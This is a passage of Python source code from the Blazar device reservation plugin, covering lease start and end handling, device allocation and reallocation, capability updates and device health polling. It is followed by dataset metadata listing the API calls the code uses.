reservation['status'], device_reservation,\n values, lease)\n\n updates = {}\n if 'min' in values or 'max' in values:\n count_range = str(values.get(\n 'min', device_reservation['count_range'].split('-')[0])\n ) + '-' + str(values.get(\n 'max', device_reservation['count_range'].split('-')[1])\n )\n updates['count_range'] = count_range\n if 'resource_properties' in values:\n updates['resource_properties'] = values.get(\n 'resource_properties')\n if updates:\n db_api.device_reservation_update(device_reservation['id'], updates)\n\n def on_start(self, resource_id, lease=None):\n device_reservation = db_api.device_reservation_get(resource_id)\n\n devices = defaultdict(list)\n for allocation in db_api.device_allocation_get_all_by_values(\n reservation_id=device_reservation['reservation_id']):\n device = db_api.device_get(allocation['device_id'])\n devices[device[\"device_driver\"]].append(device)\n\n for device_driver, devices_list in devices.items():\n self.plugins[device_driver].allocate(\n device_reservation, lease, devices_list)\n\n def before_end(self, resource_id, lease=None):\n \"\"\"Take an action before the end of a lease.\"\"\"\n device_reservation = db_api.device_reservation_get(resource_id)\n\n action = device_reservation['before_end']\n if action == 'default':\n action = CONF[plugin.RESOURCE_TYPE].before_end\n\n if action == 'email':\n plugins_utils.send_lease_extension_reminder(\n lease, CONF.os_region_name)\n\n def on_end(self, resource_id, lease=None):\n device_reservation = db_api.device_reservation_get(resource_id)\n db_api.device_reservation_update(device_reservation['id'],\n {'status': 'completed'})\n\n devices = defaultdict(list)\n allocations = db_api.device_allocation_get_all_by_values(\n reservation_id=device_reservation['reservation_id'])\n for allocation in allocations:\n device = db_api.device_get(allocation['device_id'])\n devices[device[\"device_driver\"]].append(\n db_api.device_get(allocation['device_id']))\n db_api.device_allocation_destroy(allocation['id'])\n\n for device_driver, devices_list in devices.items():\n self.plugins[device_driver].deallocate(\n device_reservation, lease, devices_list)\n\n def _get_extra_capabilities(self, device_id):\n extra_capabilities = {}\n raw_extra_capabilities = (\n db_api.device_extra_capability_get_all_per_device(device_id))\n for capability, capability_name in raw_extra_capabilities:\n key = capability_name\n extra_capabilities[key] = capability.capability_value\n return extra_capabilities\n\n def get(self, device_id):\n return self.get_device(device_id)\n\n def get_device(self, device_id):\n device = db_api.device_get(device_id)\n if device is None:\n return device\n return self.get_device_with_extra_capabilities(device)\n\n def get_device_with_extra_capabilities(self, device):\n extra_capabilities = self._get_extra_capabilities(device[\"id\"])\n if extra_capabilities:\n res = device.copy()\n res.update(extra_capabilities)\n return res\n else:\n return device\n\n def list_devices(self):\n raw_device_list = db_api.device_list()\n device_list = []\n for device in raw_device_list:\n device_list.append(self.get_device(device['id']))\n return device_list\n\n def create_device(self, values):\n if 'trust_id' in values:\n del values['trust_id']\n device_id = self.plugins[values.get(\n 'device_driver')].create_device(values)\n return self.get_device(device_id)\n\n def is_updatable_extra_capability(self, capability, capability_name):\n reservations = db_utils.get_reservations_by_device_id(\n capability['device_id'], 
datetime.datetime.utcnow(),\n datetime.date.max)\n\n for r in reservations:\n plugin_reservation = db_utils.get_plugin_reservation(\n r['resource_type'], r['resource_id'])\n\n requirements_queries = plugins_utils.convert_requirements(\n plugin_reservation['resource_properties'])\n\n for requirement in requirements_queries:\n if requirement.split(\" \")[0] == capability_name:\n return False\n return True\n\n def update_device(self, device_id, values):\n # nothing to update\n if not values:\n return self.get_device(device_id)\n\n device_property_names = ['device_type', 'device_driver']\n device_properties = {}\n for prop_key in list(values.keys()):\n if prop_key in device_property_names:\n device_properties[prop_key] = values.pop(prop_key)\n if device_properties:\n db_api.device_update(device_id, device_properties)\n\n cant_update_extra_capability = []\n cant_delete_extra_capability = []\n previous_capabilities = self._get_extra_capabilities(device_id)\n updated_keys = set(values.keys()) & set(previous_capabilities.keys())\n new_keys = set(values.keys()) - set(previous_capabilities.keys())\n\n for key in updated_keys:\n raw_capability, cap_name = next(iter(\n db_api.device_extra_capability_get_all_per_name(\n device_id, key)))\n\n if self.is_updatable_extra_capability(raw_capability, cap_name):\n if values[key] is not None:\n try:\n capability = {'capability_value': values[key]}\n db_api.device_extra_capability_update(\n raw_capability['id'], capability)\n except (db_ex.BlazarDBException, RuntimeError):\n cant_update_extra_capability.append(cap_name)\n else:\n try:\n db_api.device_extra_capability_destroy(\n raw_capability['id'])\n except db_ex.BlazarDBException:\n cant_delete_extra_capability.append(cap_name)\n else:\n LOG.info(\"Capability %s can't be updated because \"\n \"existing reservations require it.\",\n cap_name)\n cant_update_extra_capability.append(cap_name)\n\n for key in new_keys:\n new_capability = {\n 'device_id': device_id,\n 'capability_name': key,\n 'capability_value': values[key],\n }\n try:\n db_api.device_extra_capability_create(new_capability)\n except (db_ex.BlazarDBException, RuntimeError):\n cant_update_extra_capability.append(key)\n\n if cant_update_extra_capability:\n raise manager_ex.CantAddExtraCapability(\n host=device_id, keys=cant_update_extra_capability)\n\n if cant_delete_extra_capability:\n raise manager_ex.ExtraCapabilityNotFound(\n resource=device_id, keys=cant_delete_extra_capability)\n\n LOG.info('Extra capabilities on device %s updated with %s',\n device_id, values)\n return self.get_device(device_id)\n\n def delete_device(self, device_id):\n device = db_api.device_get(device_id)\n if not device:\n raise manager_ex.DeviceNotFound(device=device_id)\n\n if db_api.device_allocation_get_all_by_values(\n device_id=device_id):\n raise manager_ex.CantDeleteDevice(\n device=device_id,\n msg='The device is reserved.'\n )\n\n try:\n db_api.device_destroy(device_id)\n self.plugins[device[\"device_driver\"]].after_destroy(device)\n except db_ex.BlazarDBException as e:\n raise manager_ex.CantDeleteDevice(device=device_id, msg=str(e))\n\n def reallocate_device(self, device_id, data):\n allocations = self.get_allocations(device_id, data, detail=True)\n\n for alloc in allocations['reservations']:\n reservation_flags = {}\n device_allocation = db_api.device_allocation_get_all_by_values(\n device_id=device_id,\n reservation_id=alloc['id'])[0]\n\n if self._reallocate(device_allocation):\n if alloc['status'] == status.reservation.ACTIVE:\n 
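    # note: a successful reallocation of an ACTIVE reservation means the\n                    # lease keeps running on different hardware, hence the\n                    # resources_changed flag (missing_resources is used below\n                    # when no replacement device could be found)\n                    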
reservation_flags.update(dict(resources_changed=True))\n db_api.lease_update(alloc['lease_id'], dict(degraded=True))\n else:\n reservation_flags.update(dict(missing_resources=True))\n db_api.lease_update(alloc['lease_id'], dict(degraded=True))\n\n db_api.reservation_update(alloc['id'], reservation_flags)\n\n return self.get_allocations(device_id, data)\n\n def _reallocate(self, allocation):\n \"\"\"Allocate an alternative device.\n\n :param allocation: allocation to change.\n :return: True if an alternative device was successfully allocated.\n \"\"\"\n reservation = db_api.reservation_get(allocation['reservation_id'])\n device_reservation = db_api.device_reservation_get(\n reservation['resource_id'])\n lease = db_api.lease_get(reservation['lease_id'])\n\n # Remove the old device from the trait.\n if reservation['status'] == status.reservation.ACTIVE:\n device = db_api.device_get(allocation['device_id'])\n self.plugins[device[\"device_driver\"]].remove_active_device(\n device, device_reservation, lease)\n\n # Allocate an alternative device.\n start_date = max(datetime.datetime.utcnow(), lease['start_date'])\n new_deviceids = self._matching_devices(\n device_reservation['resource_properties'],\n '1-1', start_date, lease['end_date'], lease['project_id']\n )\n if not new_deviceids:\n db_api.device_allocation_destroy(allocation['id'])\n LOG.warn('Could not find alternative device for reservation %s '\n '(lease: %s).', reservation['id'], lease['name'])\n return False\n else:\n new_deviceid = new_deviceids.pop()\n db_api.device_allocation_update(allocation['id'],\n {'device_id': new_deviceid})\n LOG.warn('Resource changed for reservation %s (lease: %s).',\n reservation['id'], lease['name'])\n if reservation['status'] == status.reservation.ACTIVE:\n new_device = db_api.device_get(new_deviceid)\n self.plugins[device[\"device_driver\"]].add_active_device(\n new_device, device_reservation, lease)\n\n return True\n\n def list_allocations(self, query, detail=False):\n devices_id_list = [d['id'] for d in db_api.device_list()]\n options = self.get_query_options(query, QUERY_TYPE_ALLOCATION)\n options['detail'] = detail\n devices_allocations = self.query_device_allocations(devices_id_list,\n **options)\n self.add_extra_allocation_info(devices_allocations)\n return [{\"resource_id\": device, \"reservations\": allocs}\n for device, allocs in devices_allocations.items()]\n\n def get_allocations(self, device_id, query, detail=False):\n options = self.get_query_options(query, QUERY_TYPE_ALLOCATION)\n options['detail'] = detail\n device_allocations = self.query_device_allocations(\n [device_id], **options)\n allocs = device_allocations.get(device_id, [])\n return {\"resource_id\": device_id, \"reservations\": allocs}\n\n def query_allocations(self, devices, lease_id=None, reservation_id=None):\n return self.query_device_allocations(devices, lease_id=lease_id,\n reservation_id=reservation_id)\n\n def query_device_allocations(self, devices, lease_id=None,\n reservation_id=None, detail=False):\n \"\"\"Return dict of device and its allocations.\n\n The list element forms\n {\n 'device-id': [\n {\n 'lease_id': lease_id,\n 'id': reservation_id,\n 'start_date': lease_start_date,\n 'end_date': lease_end_date\n },\n ]\n }.\n \"\"\"\n start = datetime.datetime.utcnow()\n end = datetime.date.max\n\n reservations = db_utils.get_reservation_allocations_by_device_ids(\n devices, start, end, lease_id, reservation_id)\n device_allocations = {d: [] for d in devices}\n\n for reservation in reservations:\n if not detail:\n del 
reservation['project_id']\n del reservation['lease_name']\n del reservation['status']\n\n for device_id in reservation['device_ids']:\n if device_id in device_allocations.keys():\n device_allocations[device_id].append({\n k: v for k, v in reservation.items()\n if k != 'device_ids'})\n\n return device_allocations\n\n def update_default_parameters(self, values):\n self.add_default_resource_properties(values)\n\n def allocation_candidates(self, values):\n self._check_params(values)\n\n device_ids = self._matching_devices(\n values['resource_properties'],\n values['count_range'],\n values['start_date'],\n values['end_date'],\n values['project_id']\n )\n\n min_devices, _ = [int(n) for n in values['count_range'].split('-')]\n\n if len(device_ids) < min_devices:\n raise manager_ex.NotEnoughHostsAvailable()\n\n return device_ids\n\n def _convert_int_param(self, param, name):\n \"\"\"Checks that the parameter is present and can be converted to int.\"\"\"\n if param is None:\n raise manager_ex.MissingParameter(param=name)\n if strutils.is_int_like(param):\n param = int(param)\n else:\n raise manager_ex.MalformedParameter(param=name)\n return param\n\n def _validate_min_max_range(self, values, min_devices, max_devices):\n min_devices = self._convert_int_param(min_devices, 'min')\n max_devices = self._convert_int_param(max_devices, 'max')\n if min_devices <= 0 or max_devices <= 0:\n raise manager_ex.MalformedParameter(\n param='min and max (must be greater than or equal to 1)')\n if max_devices < min_devices:\n raise manager_ex.InvalidRange()\n values['count_range'] = str(min_devices) + '-' + str(max_devices)\n\n def _check_params(self, values):\n self._validate_min_max_range(values, values.get('min'),\n values.get('max'))\n\n if 'resource_properties' not in values:\n raise manager_ex.MissingParameter(param='resource_properties')\n\n if 'before_end' not in values:\n values['before_end'] = 'default'\n if values['before_end'] not in before_end_options:\n raise manager_ex.MalformedParameter(param='before_end')\n\n if 'on_start' not in values:\n values['on_start'] = 'default'\n\n def _matching_devices(self, resource_properties, count_range,\n start_date, end_date, project_id):\n \"\"\"Return the matching devices (preferably not allocated)\"\"\"\n count_range = count_range.split('-')\n min_device = count_range[0]\n max_device = count_range[1]\n allocated_device_ids = []\n not_allocated_device_ids = []\n filter_array = []\n start_date_with_margin = start_date - datetime.timedelta(\n minutes=CONF.device.cleaning_time)\n end_date_with_margin = end_date + datetime.timedelta(\n minutes=CONF.device.cleaning_time)\n\n if resource_properties:\n filter_array += plugins_utils.convert_requirements(\n resource_properties)\n for device in db_api.reservable_device_get_all_by_queries(\n filter_array):\n device = self.get_device_with_extra_capabilities(device)\n if not self.is_project_allowed(project_id, device):\n continue\n if not db_api.device_allocation_get_all_by_values(\n device_id=device['id']):\n not_allocated_device_ids.append(device['id'])\n elif db_utils.get_free_periods(\n device['id'],\n start_date_with_margin,\n end_date_with_margin,\n end_date_with_margin - start_date_with_margin,\n resource_type='device'\n ) == [\n (start_date_with_margin, end_date_with_margin),\n ]:\n allocated_device_ids.append(device['id'])\n if len(not_allocated_device_ids) >= int(min_device):\n shuffle(not_allocated_device_ids)\n return not_allocated_device_ids[:int(max_device)]\n all_device_ids = allocated_device_ids + 
not_allocated_device_ids\n if len(all_device_ids) >= int(min_device):\n shuffle(all_device_ids)\n return all_device_ids[:int(max_device)]\n else:\n return []\n\n def _update_allocations(self, dates_before, dates_after, reservation_id,\n reservation_status, device_reservation, values,\n lease):\n min_devices = values.get('min', int(\n device_reservation['count_range'].split('-')[0]))\n max_devices = values.get(\n 'max', int(device_reservation['count_range'].split('-')[1]))\n self._validate_min_max_range(values, min_devices, max_devices)\n resource_properties = values.get(\n 'resource_properties',\n device_reservation['resource_properties'])\n allocs = db_api.device_allocation_get_all_by_values(\n reservation_id=reservation_id)\n\n allocs_to_remove = self._allocations_to_remove(\n dates_before, dates_after, max_devices,\n resource_properties, allocs)\n\n if (allocs_to_remove and\n reservation_status == status.reservation.ACTIVE):\n raise manager_ex.NotEnoughHostsAvailable()\n\n kept_devices = len(allocs) - len(allocs_to_remove)\n if kept_devices < max_devices:\n min_devices = min_devices - kept_devices \\\n if (min_devices - kept_devices) > 0 else 0\n max_devices = max_devices - kept_devices\n device_ids = self._matching_devices(\n resource_properties,\n str(min_devices) + '-' + str(max_devices),\n dates_after['start_date'], dates_after['end_date'],\n lease['project_id'])\n if len(device_ids) >= min_devices:\n for device_id in device_ids:\n db_api.device_allocation_create(\n {'device_id': device_id,\n 'reservation_id': reservation_id})\n new_device = db_api.device_get(device_id)\n if reservation_status == status.reservation.ACTIVE:\n # Add new device into the trait.\n self.plugins[new_device[\"device_driver\"]].\\\n add_active_device(\n new_device, device_reservation, lease)\n else:\n raise manager_ex.NotEnoughHostsAvailable()\n\n for allocation in allocs_to_remove:\n db_api.device_allocation_destroy(allocation['id'])\n\n def _allocations_to_remove(self, dates_before, dates_after, max_devices,\n resource_properties, allocs):\n allocs_to_remove = []\n requested_device_ids = [device['id'] for device in\n self._filter_devices_by_properties(\n resource_properties\n )]\n\n for alloc in allocs:\n if alloc['device_id'] not in requested_device_ids:\n allocs_to_remove.append(alloc)\n continue\n if (dates_before['start_date'] > dates_after['start_date'] or\n dates_before['end_date'] < dates_after['end_date']):\n reserved_periods = db_utils.get_reserved_periods(\n alloc['device_id'],\n dates_after['start_date'],\n dates_after['end_date'],\n datetime.timedelta(seconds=1))\n\n max_start = max(dates_before['start_date'],\n dates_after['start_date'])\n min_end = min(dates_before['end_date'],\n dates_after['end_date'])\n\n if not (len(reserved_periods) == 0 or\n (len(reserved_periods) == 1 and\n reserved_periods[0][0] == max_start and\n reserved_periods[0][1] == min_end)):\n allocs_to_remove.append(alloc)\n\n kept_devices = len(allocs) - len(allocs_to_remove)\n if kept_devices > max_devices:\n allocs_to_remove.extend(\n [allocation for allocation in allocs\n if allocation not in allocs_to_remove\n ][:(kept_devices - max_devices)]\n )\n\n return allocs_to_remove\n\n def _filter_devices_by_properties(self, resource_properties):\n filter = []\n if resource_properties:\n filter += plugins_utils.convert_requirements(resource_properties)\n if filter:\n return db_api.device_get_all_by_queries(filter)\n else:\n return db_api.device_list()\n\n\nclass DeviceMonitorPlugin(monitor.GeneralMonitorPlugin):\n \"\"\"Monitor 
plugin for device resource.\"\"\"\n\n def __new__(cls, *args, **kwargs):\n if not cls._instance:\n cls._instance = \\\n super(DeviceMonitorPlugin, cls).__new__(cls, *args, **kwargs)\n cls._instance.plugins = _get_plugins()\n return cls._instance\n\n def filter_allocations(self, reservation, device_ids):\n return [alloc for alloc\n in reservation['device_allocations']\n if alloc['device_id'] in device_ids]\n\n def get_reservations_by_resource_ids(self, device_ids,\n interval_begin, interval_end):\n return db_utils.get_reservations_by_device_ids(device_ids,\n interval_begin,\n interval_end)\n\n def get_unreservable_resourses(self):\n return db_api.unreservable_device_get_all_by_queries([])\n\n def get_notification_event_types(self):\n \"\"\"Get event types of notification messages to handle.\"\"\"\n return []\n\n def notification_callback(self, event_type, payload):\n \"\"\"Handle a notification message.\n\n It is used as a callback of a notification-based resource monitor.\n :param event_type: an event type of a notification.\n :param payload: a payload of a notification.\n :return: a dictionary of {reservation id: flags to update}\n e.g. {'de27786d-bd96-46bb-8363-19c13b2c6657':\n {'missing_resources': True}}\n \"\"\"\n return {}\n\n def set_reservable(self, resource, is_reservable):\n db_api.device_update(resource[\"id\"], {\"reservable\": is_reservable})\n LOG.warn('%s %s.', resource[\"name\"],\n \"recovered\" if is_reservable else \"failed\")\n\n def poll_resource_failures(self):\n \"\"\"Check health of devices by calling driver service API.\n\n :return: a list of failed devices, a list of recovered devices.\n \"\"\"\n devices = db_api.device_get_all_by_filters({})\n\n device_partition = defaultdict(list)\n for device in devices:\n device_partition[device[\"device_driver\"]].append(device)\n\n failed_devices = []\n recovered_devices = []\n\n for device_driver in self.plugins.keys():\n try:\n driver_failed_devices, driver_recovered_devices = \\\n self.plugins[device_driver].poll_resource_failures(\n device_partition[device_driver])\n failed_devices.extend(driver_failed_devices)\n recovered_devices.extend(driver_recovered_devices)\n except AttributeError as e:\n LOG.warning('poll_resource_failures is not implemented for {}'\n .format(device_driver))\n raise e\n\n return failed_devices, recovered_devices\n", "sub_path": "blazar/plugins/devices/device_plugin.py", "file_name": "device_plugin.py", "file_ext": "py", "file_size_in_byte": 31260, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "oslo_config.cfg.StrOpt", "line_number": 38, "usage_type": "call"}, {"api_name": "oslo_config.cfg", "line_number": 38, "usage_type": "name"}, {"api_name": "oslo_config.cfg.ListOpt", "line_number": 42, "usage_type": "call"}, {"api_name": "oslo_config.cfg", "line_number": 42, "usage_type": "name"}, {"api_name": "oslo_config.cfg.IntOpt", "line_number": 46, "usage_type": "call"}, {"api_name": "oslo_config.cfg", "line_number": 46, "usage_type": "name"}, {"api_name": "oslo_config.cfg.StrOpt", "line_number": 52, "usage_type": "call"}, {"api_name": "oslo_config.cfg", "line_number": 52, "usage_type": "name"}, {"api_name": "oslo_config.cfg.BoolOpt", "line_number": 56, "usage_type": "call"}, {"api_name": "oslo_config.cfg", "line_number": 56, "usage_type": "name"}, {"api_name": "oslo_config.cfg.BoolOpt", "line_number": 60, "usage_type": "call"}, {"api_name": "oslo_config.cfg", "line_number": 60, "usage_type": "name"}, {"api_name": 
"blazar.plugins.monitor.monitor_opts", "line_number": 66, "usage_type": "attribute"}, {"api_name": "blazar.plugins.monitor", "line_number": 66, "usage_type": "name"}, {"api_name": "oslo_config.cfg.CONF", "line_number": 68, "usage_type": "attribute"}, {"api_name": "oslo_config.cfg", "line_number": 68, "usage_type": "name"}, {"api_name": "blazar.plugins.devices.RESOURCE_TYPE", "line_number": 69, "usage_type": "attribute"}, {"api_name": "blazar.plugins.devices", "line_number": 69, "usage_type": "name"}, {"api_name": "oslo_log.log.getLogger", "line_number": 70, "usage_type": "call"}, {"api_name": "oslo_log.log", "line_number": 70, "usage_type": "name"}, {"api_name": "blazar.plugins.devices.RESOURCE_TYPE", "line_number": 76, "usage_type": "attribute"}, {"api_name": "blazar.plugins.devices", "line_number": 76, "usage_type": "name"}, {"api_name": "stevedore.named.NamedExtensionManager", "line_number": 83, "usage_type": "call"}, {"api_name": "stevedore.named", "line_number": 83, "usage_type": "name"}, {"api_name": "blazar.manager.exceptions.PluginConfigurationError", "line_number": 101, "usage_type": "call"}, {"api_name": "blazar.manager.exceptions", "line_number": 101, "usage_type": "name"}, {"api_name": "blazar.plugins.base.BasePlugin", "line_number": 107, "usage_type": "attribute"}, {"api_name": "blazar.plugins.base", "line_number": 107, "usage_type": "name"}, {"api_name": "blazar.plugins.devices.RESOURCE_TYPE", "line_number": 109, "usage_type": "attribute"}, {"api_name": "blazar.plugins.devices", "line_number": 109, "usage_type": "name"}, {"api_name": "blazar.manager.exceptions.NotEnoughDevicesAvailable", "line_number": 127, "usage_type": "call"}, {"api_name": "blazar.manager.exceptions", "line_number": 127, "usage_type": "name"}, {"api_name": "blazar.db.api.device_reservation_create", "line_number": 136, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 136, "usage_type": "name"}, {"api_name": "blazar.db.api.device_allocation_create", "line_number": 139, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 139, "usage_type": "name"}, {"api_name": "blazar.db.api.reservation_get", "line_number": 145, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 145, "usage_type": "name"}, {"api_name": "blazar.db.api.lease_get", "line_number": 146, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 146, "usage_type": "name"}, {"api_name": "blazar.db.api.device_reservation_get", "line_number": 159, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 159, "usage_type": "name"}, {"api_name": "blazar.db.api.device_reservation_update", "line_number": 177, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 177, "usage_type": "name"}, {"api_name": "blazar.db.api.device_reservation_get", "line_number": 180, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 180, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 182, "usage_type": "call"}, {"api_name": "blazar.db.api.device_allocation_get_all_by_values", "line_number": 183, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 183, "usage_type": "name"}, {"api_name": "blazar.db.api.device_get", "line_number": 185, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 185, "usage_type": "name"}, {"api_name": "blazar.db.api.device_reservation_get", "line_number": 194, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 194, "usage_type": "name"}, {"api_name": 
"blazar.plugins.devices.RESOURCE_TYPE", "line_number": 198, "usage_type": "attribute"}, {"api_name": "blazar.plugins.devices", "line_number": 198, "usage_type": "name"}, {"api_name": "blazar.utils.plugins.send_lease_extension_reminder", "line_number": 201, "usage_type": "call"}, {"api_name": "blazar.utils.plugins", "line_number": 201, "usage_type": "name"}, {"api_name": "blazar.db.api.device_reservation_get", "line_number": 205, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 205, "usage_type": "name"}, {"api_name": "blazar.db.api.device_reservation_update", "line_number": 206, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 206, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 209, "usage_type": "call"}, {"api_name": "blazar.db.api.device_allocation_get_all_by_values", "line_number": 210, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 210, "usage_type": "name"}, {"api_name": "blazar.db.api.device_get", "line_number": 213, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 213, "usage_type": "name"}, {"api_name": "blazar.db.api.device_get", "line_number": 215, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 215, "usage_type": "name"}, {"api_name": "blazar.db.api.device_allocation_destroy", "line_number": 216, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 216, "usage_type": "name"}, {"api_name": "blazar.db.api.device_extra_capability_get_all_per_device", "line_number": 225, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 225, "usage_type": "name"}, {"api_name": "blazar.db.api.device_get", "line_number": 235, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 235, "usage_type": "name"}, {"api_name": "blazar.db.api.device_list", "line_number": 250, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 250, "usage_type": "name"}, {"api_name": "blazar.db.utils.get_reservations_by_device_id", "line_number": 264, "usage_type": "call"}, {"api_name": "blazar.db.utils", "line_number": 264, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 265, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 265, "usage_type": "attribute"}, {"api_name": "datetime.date", "line_number": 266, "usage_type": "attribute"}, {"api_name": "blazar.db.utils.get_plugin_reservation", "line_number": 269, "usage_type": "call"}, {"api_name": "blazar.db.utils", "line_number": 269, "usage_type": "name"}, {"api_name": "blazar.utils.plugins.convert_requirements", "line_number": 272, "usage_type": "call"}, {"api_name": "blazar.utils.plugins", "line_number": 272, "usage_type": "name"}, {"api_name": "blazar.db.api.device_update", "line_number": 291, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 291, "usage_type": "name"}, {"api_name": "blazar.db.api.device_extra_capability_get_all_per_name", "line_number": 301, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 301, "usage_type": "name"}, {"api_name": "blazar.db.api.device_extra_capability_update", "line_number": 308, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 308, "usage_type": "name"}, {"api_name": "blazar.db.exceptions.BlazarDBException", "line_number": 310, "usage_type": "attribute"}, {"api_name": "blazar.db.exceptions", "line_number": 310, "usage_type": "name"}, {"api_name": "blazar.db.api.device_extra_capability_destroy", "line_number": 314, "usage_type": "call"}, 
{"api_name": "blazar.db.api", "line_number": 314, "usage_type": "name"}, {"api_name": "blazar.db.exceptions.BlazarDBException", "line_number": 316, "usage_type": "attribute"}, {"api_name": "blazar.db.exceptions", "line_number": 316, "usage_type": "name"}, {"api_name": "blazar.db.api.device_extra_capability_create", "line_number": 331, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 331, "usage_type": "name"}, {"api_name": "blazar.db.exceptions.BlazarDBException", "line_number": 332, "usage_type": "attribute"}, {"api_name": "blazar.db.exceptions", "line_number": 332, "usage_type": "name"}, {"api_name": "blazar.manager.exceptions.CantAddExtraCapability", "line_number": 336, "usage_type": "call"}, {"api_name": "blazar.manager.exceptions", "line_number": 336, "usage_type": "name"}, {"api_name": "blazar.manager.exceptions.ExtraCapabilityNotFound", "line_number": 340, "usage_type": "call"}, {"api_name": "blazar.manager.exceptions", "line_number": 340, "usage_type": "name"}, {"api_name": "blazar.db.api.device_get", "line_number": 348, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 348, "usage_type": "name"}, {"api_name": "blazar.manager.exceptions.DeviceNotFound", "line_number": 350, "usage_type": "call"}, {"api_name": "blazar.manager.exceptions", "line_number": 350, "usage_type": "name"}, {"api_name": "blazar.db.api.device_allocation_get_all_by_values", "line_number": 352, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 352, "usage_type": "name"}, {"api_name": "blazar.manager.exceptions.CantDeleteDevice", "line_number": 354, "usage_type": "call"}, {"api_name": "blazar.manager.exceptions", "line_number": 354, "usage_type": "name"}, {"api_name": "blazar.db.api.device_destroy", "line_number": 360, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 360, "usage_type": "name"}, {"api_name": "blazar.db.exceptions.BlazarDBException", "line_number": 362, "usage_type": "attribute"}, {"api_name": "blazar.db.exceptions", "line_number": 362, "usage_type": "name"}, {"api_name": "blazar.manager.exceptions.CantDeleteDevice", "line_number": 363, "usage_type": "call"}, {"api_name": "blazar.manager.exceptions", "line_number": 363, "usage_type": "name"}, {"api_name": "blazar.db.api.device_allocation_get_all_by_values", "line_number": 370, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 370, "usage_type": "name"}, {"api_name": "blazar.status.reservation", "line_number": 375, "usage_type": "attribute"}, {"api_name": "blazar.status", "line_number": 375, "usage_type": "name"}, {"api_name": "blazar.db.api.lease_update", "line_number": 377, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 377, "usage_type": "name"}, {"api_name": "blazar.db.api.lease_update", "line_number": 380, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 380, "usage_type": "name"}, {"api_name": "blazar.db.api.reservation_update", "line_number": 382, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 382, "usage_type": "name"}, {"api_name": "blazar.db.api.reservation_get", "line_number": 392, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 392, "usage_type": "name"}, {"api_name": "blazar.db.api.device_reservation_get", "line_number": 393, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 393, "usage_type": "name"}, {"api_name": "blazar.db.api.lease_get", "line_number": 395, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 395, "usage_type": 
"name"}, {"api_name": "blazar.status.reservation", "line_number": 398, "usage_type": "attribute"}, {"api_name": "blazar.status", "line_number": 398, "usage_type": "name"}, {"api_name": "blazar.db.api.device_get", "line_number": 399, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 399, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 404, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 404, "usage_type": "attribute"}, {"api_name": "blazar.db.api.device_allocation_destroy", "line_number": 410, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 410, "usage_type": "name"}, {"api_name": "blazar.db.api.device_allocation_update", "line_number": 416, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 416, "usage_type": "name"}, {"api_name": "blazar.status.reservation", "line_number": 420, "usage_type": "attribute"}, {"api_name": "blazar.status", "line_number": 420, "usage_type": "name"}, {"api_name": "blazar.db.api.device_get", "line_number": 421, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 421, "usage_type": "name"}, {"api_name": "blazar.db.api.device_list", "line_number": 428, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 428, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 465, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 465, "usage_type": "attribute"}, {"api_name": "datetime.date", "line_number": 466, "usage_type": "attribute"}, {"api_name": "blazar.db.utils.get_reservation_allocations_by_device_ids", "line_number": 468, "usage_type": "call"}, {"api_name": "blazar.db.utils", "line_number": 468, "usage_type": "name"}, {"api_name": "blazar.manager.exceptions.NotEnoughHostsAvailable", "line_number": 503, "usage_type": "call"}, {"api_name": "blazar.manager.exceptions", "line_number": 503, "usage_type": "name"}, {"api_name": "blazar.manager.exceptions.MissingParameter", "line_number": 510, "usage_type": "call"}, {"api_name": "blazar.manager.exceptions", "line_number": 510, "usage_type": "name"}, {"api_name": "oslo_utils.strutils.is_int_like", "line_number": 511, "usage_type": "call"}, {"api_name": "oslo_utils.strutils", "line_number": 511, "usage_type": "name"}, {"api_name": "blazar.manager.exceptions.MalformedParameter", "line_number": 514, "usage_type": "call"}, {"api_name": "blazar.manager.exceptions", "line_number": 514, "usage_type": "name"}, 